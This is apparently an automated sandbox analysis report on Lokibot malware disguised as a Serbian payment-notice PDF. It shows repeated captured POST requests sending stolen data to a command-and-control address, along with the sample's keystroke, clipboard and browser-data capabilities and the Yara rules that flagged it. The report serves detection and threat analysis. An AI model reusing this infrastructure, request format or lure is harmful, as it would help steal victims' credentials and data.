Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 107.175.150.73
Contains functionality to download additional files from the internet
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 2_2_00404ED4 recv
Posts data to webserver
Source: unknown | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 176 | Connection: close
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 12 Dec 2019 08:39:53 GMT | Server: Apache | Connection: close | Content-Type: text/html; charset=UTF-8 | Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: File not found.
Urls found in memory or binary data
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, 00000002.00000002.2174873937.000000000049F000.00000040.00000001.sdmp | String found in binary or memory: http://107.175.150.73/~giftioz/.vokol/fre.php
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, 00000002.00000001.1755498220.0000000000400000.00000040.00020000.sdmp | String found in binary or memory: http://www.ibsensoftware.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_00428C70 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_004536D8 GetKeyboardState
Creates a DirectInput object (often for capturing keystrokes)
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, 00000000.00000002.1757187830.00000000007B0000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.1759806044.00000000029C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1759806044.00000000029C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
Source: 00000002.00000001.1755498220.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000001.1755498220.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
Source: 00000000.00000002.1757511531.0000000002440000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1757511531.0000000002440000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
Source: 00000002.00000002.2174747266.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.2174747266.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
Source: 2.1.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.1.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.2440000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.2440000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 2.1.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.1.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.29c0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.29c0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.2440000.2.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.2440000.2.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.29c0000.3.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.29c0000.3.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_0047137C NtdllDefWindowProc_A
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_004323E4 NtdllDefWindowProc_A
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_00456654 NtdllDefWindowProc_A,GetCapture
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_0046662C GetSubMenu,SaveDC,RestoreDC,7361B080,SaveDC,RestoreDC,NtdllDefWindowProc_A
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_00471B24 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_00471BD4 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus
Detected potential crypto function
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_0043C24C
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_0046662C
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_004416A4
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_0046B874
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 2_2_0040549C
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 2_2_004029D4
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 2_1_0040549C
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 2_1_004029D4
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: String function: 00403F5C appears 93 times
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: String function: 00406370 appears 63 times
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: String function: 00405B6F appears 84 times
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: String function: 00404BEE appears 56 times
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: String function: 00404B22 appears 54 times
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: String function: 00412093 appears 40 times
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: String function: 0041219C appears 90 times
PE file contains strange resources
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, 00000000.00000002.1756992108.0000000000780000.00000002.00000001.sdmp | Binary or memory string: OriginalFilename user32j% vs Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe
Searches the installation path of Mozilla Firefox
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
Yara signature match
Source: 00000000.00000002.1759806044.00000000029C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1759806044.00000000029C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000002.00000001.1755498220.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000001.1755498220.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000000.00000002.1757511531.0000000002440000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1757511531.0000000002440000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000002.00000002.2174747266.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.2174747266.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.1.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.1.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.2440000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.2440000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.1.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.1.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.29c0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.29c0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
